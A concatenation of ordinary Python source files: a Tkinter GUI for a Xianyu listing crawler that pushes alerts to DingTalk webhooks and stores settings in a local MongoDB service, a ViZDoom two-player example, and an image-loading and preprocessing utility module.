self.threadnumVar = tk.IntVar()
self.salenumVar = tk.IntVar()
self.logMessage = JoinableQueue()
self.errMessage = JoinableQueue()
self.dbconf = MongoConfig()
self.dbprod = MongoProduct()
self.dbkey = MongoKeyword()
self.dbtime = MongoTime()
self.create_page()
self.show_logs()
self.asyCraler()
# self._temp_t()
def asyCraler(self):
TProcess_crawler = Process(target=_run, args=(self.logMessage, self.errMessage))
TProcess_crawler.daemon = True
TProcess_crawler.start()
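        # NOTE: join() blocks this call (and therefore __init__) until the
        # crawler process exits; the commented-out _temp_t() helper below would
        # run the same call on a background thread instead.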
TProcess_crawler.join()
def _temp_t(self):
t = threading.Thread(target=self.asyCraler, args=())
# t.daemon=True
t.start()
print('启动线程')
# t.join()
# TProcess_crawler.join()
def create_page(self):
        self.meun()  # menu
        self.keyword()  # keywords
        self.config()  # configuration
        self.log()  # log
        self.error_log()  # system log
        self.user()  # user info
        self.img()  # image
        # self.loading()  # progress bar
    def img(self):  # image
photo = PhotoImage(file='xianyu.png')
label = Label(image=photo)
label.image = photo
label.grid(row=0, column=2, columnspan=2, rowspan=2, sticky=W + E + N + S, padx=5, pady=5)
    def keyword(self):  # DingTalk robot
        Keyword = tk.LabelFrame(self.window, text="钉钉机器人", padx=10, pady=10)  # horizontal/vertical padding
Keyword.place(x=1070, y=100)
self.keywordListBox = Listbox(Keyword, width=35, height=8, )
self.keywordListBox.pack(side=LEFT)
keywordScroBar = Scrollbar(Keyword)
keywordScroBar.pack(side=RIGHT, fill=Y)
self.keywordListBox['yscrollcommand'] = keywordScroBar.set
keywords = self.dbconf.select_all()
for key in keywords:
keyword = key.get('webhook')
self.keywordListBox.insert(END, '机器人:{};'.format(keyword))
keywordScroBar['command'] = self.keywordListBox.yview
        keywordoption = tk.LabelFrame(self.window, text="", padx=10, pady=5)  # horizontal/vertical padding
keywordoption.place(x=1070, y=290)
tk.Button(keywordoption, text="添加机器人", command=self.add_keyword).grid(column=0, row=1, padx=9, pady=5)
tk.Button(keywordoption, text="删除机器人", command=self.delete_keyword).grid(column=1, row=1, padx=9, pady=5)
tk.Button(keywordoption, text="测试机器人", command=self.testLogin).grid(column=2, row=1, padx=9, pady=5)
def insert_userListbox(self):
userinfos = self.dbkey.select_all({})
for user in userinfos:
username = user.get('keyword')
pwd = user.get('minPrice')
maxP = user.get('maxPrice')
start = user.get('start')
if start == 1:
now_status = '开启'
else:
now_status = '关闭'
self.userListBox.insert(END, '关键字:{} 价格:{}-{} 状态:{};'.format(username, pwd, maxP, now_status))
    def user(self):  # user info
        User = tk.LabelFrame(self.window, text="关键字任务", padx=10, pady=5)  # horizontal/vertical padding
User.place(x=30, y=100)
self.userListBox = Listbox(User, width=50, height=9, )
self.userListBox.pack(side=LEFT)
userScroBar = Scrollbar(User)
userScroBar.pack(side=RIGHT, fill=Y)
self.userListBox['yscrollcommand'] = userScroBar.set
self.insert_userListbox()
userScroBar['command'] = self.userListBox.yview
# userScrotext = scrolledtext.ScrolledText(User, width=30, height=6, padx=10, pady=10, wrap=tk.WORD)
# userScrotext.grid(columnspan=2, pady=10)
        Useroption = tk.LabelFrame(self.window, text="", padx=10, pady=5)  # horizontal/vertical padding
Useroption.place(x=30, y=300)
tk.Button(Useroption, text="添加关键字", command=self.add_user).grid(column=0, row=1, padx=57, pady=5)
tk.Button(Useroption, text="删除关键字", command=self.delete_use).grid(column=1, row=1, padx=57, pady=5)
tk.Button(Useroption, text="一键开启", command=self.all_start).grid(column=0, row=3, padx=55, pady=5)
tk.Button(Useroption, text="一键关闭", command=self.all_stop).grid(column=1, row=3, padx=55, pady=5)
self.startBtn = tk.Button(Useroption, text="单项开启", command=self.start_spider)
self.startBtn.grid(column=0, row=2, padx=55, pady=5)
self.stopBtn = tk.Button(Useroption, text="单项关闭", command=self.stop_spider)
self.stopBtn.grid(column=1, row=2, padx=55, pady=5)
    def config(self):  # configuration
        Config = tk.LabelFrame(self.window, text="配置", padx=25, pady=5)  # horizontal/vertical padding
        Config.place(x=30, y=430)
        tk.Label(Config, text="爬取频率/s:").grid(column=0, row=0, sticky='w', pady=5)  # crawl-interval label
        tk.Label(Config, text="发送方式:").grid(column=0, row=1, sticky='w', pady=5)  # send-mode label
try:
configs = self.dbtime.select_one({})
self.threadnum = configs.get('time')
self.salenum = configs.get('type')
except Exception as e:
self.dbtime.insert({"flag": 1, "time": 10, "type": 3})
self.threadnum = 10
self.salenum = 3
self.threadnumVar.set(self.threadnum)
self.salenumVar.set(self.salenum)
self.threadEntry = tk.Entry(Config, textvariable=self.threadnumVar, width=38)
self.threadEntry.grid(column=1, row=0, pady=5)
self.saleEntry = tk.Entry(Config, textvariable=self.salenumVar, width=38)
self.saleEntry.grid(column=1, row=1, pady=5)
        Config_start = tk.LabelFrame(self.window, text="", padx=10, pady=5)  # horizontal/vertical padding
Config_start.place(x=30, y=550)
tk.Button(Config_start, text="更新配置", command=self.updata_config).grid(column=0, row=0, pady=5, ipadx=20,padx=15)
self.clearDbBtn = tk.Button(Config_start, text="清空配置", command=self.clearDB)
self.clearDbBtn.config(bg='red')
self.clearDbBtn.grid(column=2, row=0, pady=5, ipadx=15,padx=15)
# self.exportDbBtn = tk.Button(Config_start, text="导出数据", command='')
# self.exportDbBtn.config(state=tk.DISABLED)
# self.exportDbBtn.grid(column=2, row=0, pady=5, ipadx=15)
# self.testloginBtn = tk.Button(Config_start, text="测试登录", command=self.testLogin)
# self.testloginBtn.grid(column=0, row=1, pady=5, ipadx=15)
# self.loginBtn = tk.Button(Config_start, text="账户登录", command=self.login)
# self.loginBtn.grid(column=1, row=1, pady=5, ipadx=15)
self.logoutBtn = tk.Button(Config_start, text="清除缓存", command=self.clear_product)
self.logoutBtn.grid(column=1, row=0, pady=5, ipadx=15,padx=15)
# self.listenBtn = tk.Button(Config_start, text="开启监听", command=self.listen_spider)
# self.listenBtn.grid(column=0, row=2, pady=5, ipadx=15)
# self.startBtn = tk.Button(Config_start, text="开始采集", command=self.start_spider)
# self.startBtn.grid(column=1, row=2, pady=5, ipadx=15)
# self.stopBtn = tk.Button(Config_start, text="停止采集", command=self.stop_spider)
# self.stopBtn.grid(column=2, row=2, pady=5, ipadx=15)
def loading(self):
        # progress bar
        Loading = tk.LabelFrame(self.window, text="进度条", padx=10, pady=5)  # horizontal/vertical padding
Loading.place(x=350, y=20)
canvas = tk.Canvas(Loading, width=665, height=22, bg="white")
canvas.grid()
    def log(self):  # log
self.logMessage.put('欢迎使用【闲鱼信息采集器】')
        logInformation = tk.LabelFrame(self.window, text="日志", padx=10, pady=10)  # horizontal/vertical padding
logInformation.place(x=450, y=100)
self.logInformation_Window = scrolledtext.ScrolledText(logInformation, width=77, height=22, padx=10, pady=10,
wrap=tk.WORD)
self.logInformation_Window.grid()
    def error_log(self):  # system log
        error_logInformation = tk.LabelFrame(self.window, text="系统日志", padx=10, pady=10)  # horizontal/vertical padding
error_logInformation.place(x=450, y=460)
self.errorInformation_Window = scrolledtext.ScrolledText(error_logInformation, width=77, height=5, padx=10,
pady=10,
wrap=tk.WORD)
self.errorInformation_Window.grid()
    # menu ("About" entries)
def meun(self):
menubar = tk.Menu(self.window)
aboutmemu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label='关于', menu=aboutmemu)
aboutmemu.add_command(label='软件说明', command=self.show_Description)
aboutmemu.add_command(label='版本', command=self.show_Version)
aboutmemu.add_command(label='开发者', command=self.show_Developer)
window.config(menu=menubar)
    # add a DingTalk robot
def add_keyword(self):
optionKeyword(self.window, self.keywordListBox)
    # delete a DingTalk robot
def delete_keyword(self):
if tk.messagebox.askyesno('警告', message='是否删除机器人'):
try:
value = self.keywordListBox.get(self.keywordListBox.curselection())
keyword = re.findall('机器人:(.*?);', value.replace('\n', '').replace(' ', ''), re.S)
print(keyword[0])
self.dbconf.delete({"webhook": keyword[0]})
self.keywordListBox.delete(ACTIVE)
self.errMessage.put('成功删除机器人:{}'.format(keyword[0]))
tk.messagebox.showinfo('成功', message='成功删除机器人:{}'.format(keyword[0]))
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定关键字删除')
    # test a DingTalk robot
def testLogin(self):
self.errMessage.put('进行机器人测试')
value = self.keywordListBox.get(self.keywordListBox.curselection())
keyword = re.findall('机器人:(.*?);', value.replace('\n', '').replace(' ', ''), re.S)
dmsg = DingMsg()
if dmsg.send_msg(webhook_url='https://oapi.dingtalk.com/robot/send?access_token=' + keyword[0],
data='欢迎测试闲鱼信息及时推送器-机器人验证', type=4):
tk.messagebox.showinfo(title='恭喜', message='信息已经发送到钉钉')
self.errMessage.put('信息已经发送到钉钉')
else:
tk.messagebox.showerror(title='警告', message='此链接可能失效,请重试')
self.errMessage.put('此链接可能失效,请重试')
    # add a keyword task
def add_user(self):
optionUser(self.window, self.userListBox)
def _get_active_keyList(self):
try:
value = self.userListBox.get(self.userListBox.curselection())
print(value)
user_pwd = re.findall('关键字:(.*?)价格', value.replace('\n', '').replace(' ', ''), re.S)
return user_pwd
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定关键字')
return ['请选定指定关键字']
    # delete a keyword task
def delete_use(self):
user_pwd = self._get_active_keyList()
if user_pwd[0] == '请选定指定关键字':
self.errMessage.put('关闭闲鱼数据:{}采集'.format(user_pwd))
return False
if tk.messagebox.askyesno('警告', message='是否删除关键字'):
try:
self.dbkey.delete({"keyword": user_pwd[0]})
self.userListBox.delete(ACTIVE)
self.errMessage.put('成功删除关键字任务{}'.format(user_pwd[0]))
tk.messagebox.showinfo('成功', message='成功删除用户{}'.format(user_pwd[0]))
except Exception as e:
tk.messagebox.showerror('错误', message='请选定指定账户删除')
    # update configuration
def updata_config(self):
self.logMessage.put('更新配置')
threadnum = self.threadEntry.get()
salenum = self.saleEntry.get()
print(threadnum)
print(salenum)
self.dbtime.update_time(int(threadnum))
self.dbtime.update_type(int(salenum))
tk.messagebox.showinfo(title='配置', message='配置信息更新成功!')
def all_start(self):
self.dbkey.collection.update_many({"start": 0}, {'$set': {"start": 1}})
self.userListBox.delete(0, END)
self.insert_userListbox()
self.errMessage.put('已开启全部任务')
tk.messagebox.showinfo(title='任务', message='已开启全部任务!')
def all_stop(self):
self.dbkey.collection.update_many({"start": 1}, {'$set': {"start": 0}})
self.userListBox.delete(0, END)
self.insert_userListbox()
self.errMessage.put('已关闭全部任务')
tk.messagebox.showinfo(title='任务', message='已关闭全部任务!')
def start_spider(self):
        # TODO: add a function that fetches all configuration info.
user_pwd = self._get_active_keyList()
self.errMessage.put('开始闲鱼数据:{}采集'.format(user_pwd))
self.dbkey.update_start(user_pwd[0])
self.userListBox.delete(0, END)
self.insert_userListbox()
def stop_spider(self):
        # TODO: restore the button state
user_pwd = self._get_active_keyList()
self.errMessage.put('关闭闲鱼数据:{}采集'.format(user_pwd))
self.dbkey.update_stop(user_pwd[0])
self.userListBox.delete(0, END)
self.insert_userListbox()
def clear_product(self):
if tk.messagebox.askyesno(title='删除', message='这将清空缓存数据,是否确定删除?'):
self.logMessage.put('开始清除数据库缓存')
self.dbprod.delete_all({})
self.logMessage.put('清除数据库缓存结束')
tk.messagebox.showinfo(title='恭喜', message='清除数据库缓存结束')
    # clear the database
def clearDB(self):
if tk.messagebox.askyesno(title='删除', message='这将清空所有的数据,是否确定删除?'):
if tk.messagebox.askyesno(title='再次确认', message='清空数据后请重启软件,是否确定删除?'):
self.dbkey.delete_all({})
self.dbtime.delete_all({})
self.dbconf.delete_all({})
self.dbprod.delete_all({})
self.logMessage.put('清除数据库所有数据')
self.logMessage.put('请重新启动软件,加载配置')
self.window.update()
tk.messagebox.showinfo(title='恭喜', message='所有数据清除完成!请重新启动软件,加载配置')
def log_queue(self):
while True:
log = self.logMessage.get()
date = datetime.now().strftime("%m-%d %H:%M:%S")
self.logInformation_Window.insert(END, '[{date}][{log}]'.format(date=date, log=log) + '\n')
self.logInformation_Window.see(END)
# self.logMessage.task_done()
def errlog_queue(self):
while True:
log = self.errMessage.get()
date = datetime.now().strftime("%m-%d %H:%M:%S")
self.errorInformation_Window.insert(END, '[{date}][{log}]'.format(date=date, log=log) + '\n')
self.errorInformation_Window.see(END)
def show_logs(self):
Tlog_queue = threading.Thread(target=self.log_queue, args=())
Terrlog_queue = threading.Thread(target=self.errlog_queue, args=())
Tlog_queue.daemon = True
Tlog_queue.start()
Terrlog_queue.daemon = True
Terrlog_queue.start()
# self.logMessage.join()
def show_Description(self):
Description(self.window)
def show_Version(self):
Version(self.window)
def show_Developer(self):
Developer(self.window)
# robot (webhook) management dialog
class optionKeyword(object):
'''
    Dialog for adding / editing a DingTalk robot webhook.
'''
def __init__(self, master, userListBox):
self.master = master
self.userListBox = userListBox
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
self.dbconf = MongoConfig()
ww = 400
wh = 300
x = (sw - ww) / 4
y = (sh - wh) / 4
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # size/position of the dialog window
self.window.title('机器人')
self.keyword = tk.StringVar()
self.create_page()
def create_page(self):
        User = tk.LabelFrame(self.window, text="机器人", padx=10, pady=5)  # horizontal/vertical padding
User.place(x=50, y=80)
        tk.Label(User, text="机器人:").grid(column=0, row=0, sticky='w', pady=5, padx=5)  # robot webhook label
self.keywordEntry = tk.Entry(User, textvariable=self.keyword, width=23)
self.keywordEntry.grid(column=1, row=0, pady=5)
tk.Button(User, text="确认添加", command=self.add_keyword).grid(columnspan=2, row=2, pady=5, ipadx=10)
def add_keyword(self):
keyword = self.keywordEntry.get().replace('https://oapi.dingtalk.com/robot/send?access_token=', '')
        if keyword == '':
tk.messagebox.showerror(title='错误', message='机器人webhook不为空!')
else:
rechack_keyword = tk.messagebox.askyesno(title='检查', message='请核对{}信息无误后确认添加'.format(keyword))
if rechack_keyword:
if self.dbconf.select_one({"webhook": keyword}):
self.keyword.set('')
tk.messagebox.showerror('错误', '此机器人已经存在')
else:
self.dbconf.insert({"webhook": keyword})
self.keyword.set('')
                    self.userListBox.insert(END, '机器人:{};'.format(keyword))  # show the new robot in the listbox
# self.window.destroy()
# optionUser(self.master)
tk.messagebox.showinfo(title='恭喜', message='关键字添加成功!')
window.update()
def delete_user(self, user, pwd):
pass
# user (keyword task) data operations
class optionUser(object):
'''
    Dialog for adding / editing a keyword task (user account).
'''
def __init__(self, master, userListBox):
self.master = master
self.userListBox = userListBox
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 4
y = (sh - wh) / 3
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # window size and position
self.window.title('关键字')
self.username = tk.StringVar()
self.password = tk.StringVar()
self.maxPrice = tk.StringVar()
self.dbkey = MongoKeyword()
self.create_page()
def create_page(self):
        User = tk.LabelFrame(self.window, text="关键字配置", padx=10, pady=5)  # horizontal and vertical padding of 10
        User.place(x=50, y=80)
        tk.Label(User, text="关键字:").grid(column=0, row=0, sticky='w', pady=5, padx=5)  # keyword field
        tk.Label(User, text="最低价格:").grid(column=0, row=1, sticky='w', pady=5, padx=5)  # minimum price field
        tk.Label(User, text="最高价格:").grid(column=0, row=2, sticky='w', pady=5, padx=5)  # maximum price field
self.userEntry = tk.Entry(User, textvariable=self.username, width=23)
self.userEntry.grid(column=1, row=0, pady=5)
self.pwdEntry = tk.Entry(User, textvariable=self.password, width=23)
self.pwdEntry.grid(column=1, row=1, pady=5)
self.maxPEntry = tk.Entry(User, textvariable=self.maxPrice, width=23)
self.maxPEntry.grid(column=1, row=2, pady=5)
tk.Button(User, text="确认添加", command=self.add_user).grid(columnspan=2, row=3, pady=5, ipadx=10)
def add_user(self):
username = self.userEntry.get()
pwd = self.pwdEntry.get()
maxP = self.maxPEntry.get()
        if username == '':
tk.messagebox.showerror(title='错误', message='关键字不为空!')
else:
            recheck_useinfo = tk.messagebox.askyesno(title='检查', message='请核对{}信息无误后确认添加'.format(username))
            if recheck_useinfo:
if self.dbkey.select_one({"keyword": username}):
self.username.set('')
self.password.set('')
self.maxPrice.set('')
tk.messagebox.showerror('错误', '此关键字已经存在')
else:
if pwd == '':
pwd = 0
if maxP == '':
maxP = 'None'
self.dbkey.insert({"start": 1, "keyword": username, "minPrice": pwd, "maxPrice": maxP})
self.username.set('')
self.password.set('')
self.maxPrice.set('')
                    self.userListBox.insert(END, '关键字:{} 价格:{}-{} 状态:{};'.format(username, pwd, maxP, '开启'))  # also show the new entry in the listbox
# self.window.destroy()
# optionUser(self.master)
tk.messagebox.showinfo(title='恭喜', message='账户添加成功!')
window.update()
def delete_user(self, user, pwd):
pass
# Usage instructions window
class Description():
    '''
    Window describing how to use the software
    '''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 650
wh = 720
x = (sw - ww) / 3
y = (sh - wh) / 3
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # window size and position
self.window.title('使用说明')
self.create_page()
def create_page(self):
        Dev = tk.LabelFrame(self.window, text="关于使用说明", padx=10, pady=5)  # horizontal and vertical padding of 10
Dev.place(x=50, y=50)
text = "【使用前仔细阅读使用说明】 \n\n" \
"使用说明\n" \
"本项目采用异步爬取,对于闲鱼速度快,效率高。\n" \
"**注意事项**\n" \
"- 钉钉接口每个机器人每分钟只能发送20条信息。次数太多会被限制。一个群聊可以创建6个机\n器人的webhook。建议将次6条都加入到程序的机器人队列\n" \
"- 钉钉接口存在敏感字检测。当爬取的信息触发了阿里系的检测系统,信息不能发送。这里在\n日志面板给出已经提示。\n" \
"- 经过测试100多关键字的爬取效率在8-10s内完成。\n" \
"- 给出的关键字描述尽可能精确,避免大范围的搜索。如错误示例:关键字‘空调’ 范围广与\n‘空调’+品牌 或 ’空调‘+ 功能部件,缩小搜索范围。\n" \
"- 程序的爬取频率设定时间尽量多一些。否者爬取的发送信息很多,将导致钉钉接口失效。这里爬\n取频率代表一个全部爬虫结束到下一次爬虫开始的时间。建议设置为10s左右。将会\n10秒后进行下一次执行。\n" \
"- 发送方式 :1-单文本发送(若消息过多,钉钉接口限制),2-连接文本发送(手机端不支\n持跳转闲鱼app),3-markdown文本(推荐、将一次爬\n取的消息汇聚到个文本中,较少钉钉接口压力)\n" \
"- 添加关键字:关键字不为空,价格若不填则搜索时为全价。\n" \
"- 删除关键字:选中关键字任务,点击删除,确认删除。\n" \
"- 单项开启:选中关键字任务,点击开启,任务单独开启\n" \
"- 单项关闭:选中关键字任务,点击关闭,任务单独关闭\n" \
"- 一键开启:点击一键开启,默认开启全部任务\n" \
"- 一键关闭:点击一键关闭,默认关闭全部任务\n" \
"- 更新配置:实时更新爬取频率,发送方式\n" \
"- 清除缓存:清除缓存文件。软件长时间使用产生大量缓存文件,硬件运行效率下降\n" \
"- 清空配置:清除所有配置选项+缓存文件。一般不建议使用\n" \
"- 日志文件:输出日志信息\n" \
"- 系统日志:输入操作信息\n" \
"- 钉钉机器人-添加机器人:添加钉钉机器人的webhook完整链接\n" \
"- 钉钉机器人-删除机器人:选中机器人链接,点击删除,删除成功\n" \
"- 钉钉机器人-测试机器人:测试插入的webhook是否有效。将发送'欢迎测试闲鱼\n信息及时推送器-机器人验证'到钉钉群\n" \
        tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5)  # description text
# Version info window
class Version():
    '''
    Window showing the software version information
    '''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # window size and position
self.window.title('软件版本')
self.create_page()
def create_page(self):
        Dev = tk.LabelFrame(self.window, text="关于版本更新", padx=10, pady=5)  # horizontal and vertical padding of 10
Dev.place(x=50, y=50)
text = " 2019年4月 26日 版本:V1.0\n "
        tk.Label(Dev, text=text).grid(column=0, row=0, sticky='w', pady=5, padx=5)  # version text
# Developer info window
class Developer():
    '''
    Window introducing the software developer
    '''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # window size and position
self.window.title('开发者')
self.create_page()
def create_page(self):
        Dev = tk.LabelFrame(self.window, text="关于开发者", padx=10, pady=5)  # horizontal and vertical padding of 10
Dev.place(x=50, y=50)
text = " 作者:AJay13\n" \
" 技能:熟悉各项爬虫与反爬虫,数据清洗,\n 网站搭建,软件编写\n" \
" 联系:BoeSKh5446sa23sadKJH84ads5\n"
        tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5)  # developer info text
# Trial-period (licence expiry) check
def test_time(over_time):
from datetime import datetime
d2 = datetime.strptime(over_time, '%Y-%m-%d %H:%M:%S')
now = datetime.now()
if d2 > now:
return True
else:
return False
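# A minimal usage sketch (not part of the original app) of the trial-period check
# above; the date strings below are hypothetical examples, not real licence dates.
def _test_time_example():
    # A date in the past means the trial has expired -> False.
    assert not test_time('2000-01-01 00:00:00')
    # A date far in the future keeps the app enabled -> True.
    return test_time('2099-12-31 23:59:59')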
if __name__ == '__main__':
if test_time('2019-4-26 16:00:00'):
        window = tk.Tk()  # root window
        print('开始')
        window.title("闲鱼信息及时推送器定制版ByAjay13")  # root window title
basePath = os.path.abspath(os.path.dirname(__file__))
print(basePath)
if not os.path.exists(os.path.join(basePath, 'temp')):
os.mkdir(os.path.join(basePath, 'temp'))
if not os.path.exists(os.path.join(basePath, 'log')):
os.mkdir(os.path.join(basePath, 'log'))
mongod = os.path.join(basePath, 'bin', 'mongod.exe')
dbpath = os.path.join(basePath, 'temp')
logpath = os.path.join(basePath, 'log', 'mongodb.log')
if not os.path.exists(logpath):
os.system(
'{} --dbpath {} --logpath {} --directoryperdb --serviceName mongodb_tb --install'.format(mongod, dbpath,
logpath))
os.system('net start mongodb_tb')
else:
os.system('net start mongodb_tb')
MainPage(window)
        # Prerequisite configuration
        # Configure MongoDB as the data service and initialise the configuration service
        '''
        Start the server service.
        Try to connect to the database and look for the config entry with db=1. If the connection fails,
        alert that the database configuration is wrong, try to initialise it automatically, or contact the administrator:
        1. Create the local MongoDB data folder
        2. Create the local MongoDB log folder
        3. Run the service configuration command
        4. Start the service
        5. Insert db=1 into the configuration collection
        Once the service starts normally, the Tk panel loads the configuration items.
        The asynchronous crawler thread starts, re-reads the configuration every 10 seconds, and loads it into the process.
        Keywords with start == 1 are added to the crawl queue.
        '''
print('监听')
window.mainloop()
else:
        window = tk.Tk()  # root window
        window.title("闲鱼信息及时推送器定制版ByAjay13")  # root window title
window.wm_attributes('-topmost', 1)
sw = window.winfo_screenwidth()
sh = window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
        window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # window size and position
        Dev = tk.LabelFrame(window, text="授权超时", padx=10, pady=5)  # horizontal and vertical padding of 10
Dev.place(x=50, y=50)
text = " 你已经超出授权使用期限\n" \
" 请联系管理员进行提权\n \n" \
" 联系:BoeSKh5446sa23sadKJH84ads5\n"
        tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5)  # expiry notice text
window.mainloop()
|
multiple_instances.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice
from vizdoom import *
# For a multiplayer game use processes (ZDoom's multiplayer sync mechanism prevents threads from working as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../../scenarios/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
player2()
print("Done")
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir, split_name='train'):
"""
Load the data arrays from the [train/val/test].txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
split_name : str
Name of the data split to load
Returns
-------
X : Numpy array of strs
        First column: contains the 'absolute_path_to_file' of each image.
y : Numpy array of int32
Image label number
"""
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
    else:  # the test file may not have labels
y = None
return X, y
def mount_nextcloud(frompath, topath):
"""
Mount a NextCloud folder in your local machine or viceversa.
"""
command = (['rclone', 'copy', frompath, topath])
result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = result.communicate()
if error:
warnings.warn("Error while mounting NextCloud: {}".format(error))
return output, error
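# Hedged usage sketch for the rclone wrapper above; the remote name "nextcloud:" and
# the local path below are hypothetical placeholders, not project defaults.
def _mount_nextcloud_example():
    output, error = mount_nextcloud('nextcloud:/datasets/images', '/srv/data/images')
    return output, error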
def load_class_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class names...")
    class_names = np.genfromtxt(os.path.join(splits_dir, 'classes.txt'), dtype='str', delimiter='\n')
return class_names
def load_class_info(splits_dir):
"""
    Load the list of class descriptions (additional info for each class)
    Returns
    -------
    Numpy array of shape (N) containing strs with class info
"""
print("Loading class info...")
    class_info = np.genfromtxt(os.path.join(splits_dir, 'info.txt'), dtype='str', delimiter='\n')
return class_info
def load_image(filename, filemode='local'):
"""
Function to load a local image path (or an url) into a numpy array.
Parameters
----------
filename : str
Path or url to the image
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
Returns
-------
A numpy array
"""
if filemode == 'local':
image = cv2.imread(filename, cv2.IMREAD_COLOR)
if image is None:
raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
elif filemode == 'url':
try:
if filename.startswith('data:image'): # base64 encoded string
data = base64.b64decode(filename.split(';base64,')[1])
else: # normal url
data = requests.get(filename).content
data = np.frombuffer(data, np.uint8)
image = cv2.imdecode(data, cv2.IMREAD_COLOR)
if image is None:
raise Exception
except:
raise ValueError('Incorrect url path: \n {}'.format(filename))
else:
raise ValueError('Invalid value for filemode.')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # change from default BGR OpenCV format to Python's RGB format
return image
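# Minimal sketch of the two loading modes described above; the file path and the URL
# are hypothetical placeholders.
def _load_image_example():
    im_local = load_image('/data/images/flower.jpg', filemode='local')
    im_remote = load_image('https://example.com/flower.jpg', filemode='url')
    return im_local.shape, im_remote.shape  # both are (H, W, 3) RGB arrays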
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
"""
    Standardize batch to feed the net. Adapted from [1] to replace the default ImageNet mean and std.
[1] https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
Parameters
----------
batch : list of numpy arrays
mean_RGB, std_RGB : list of floats, len=3
Mean/std RGB values for your dataset.
channels_first : bool
Use batch of shape (N, C, H, W) instead of (N, H, W, C)
Returns
-------
Numpy array
"""
assert type(batch) is list, "Your batch must be a list of numpy arrays"
mean_RGB, std_RGB = np.array(mean_RGB), np.array(std_RGB)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
if mode == 'caffe':
batch = batch[:, :, :, ::-1] # switch from RGB to BGR
if mode == 'tf':
        batch /= 127.5  # scale to roughly [-1, 1]
if mode == 'torch':
batch /= std_RGB
if channels_first:
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
return batch.astype(np.float32)
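# Sketch of a preprocessing call, assuming ImageNet-like RGB statistics; the exact
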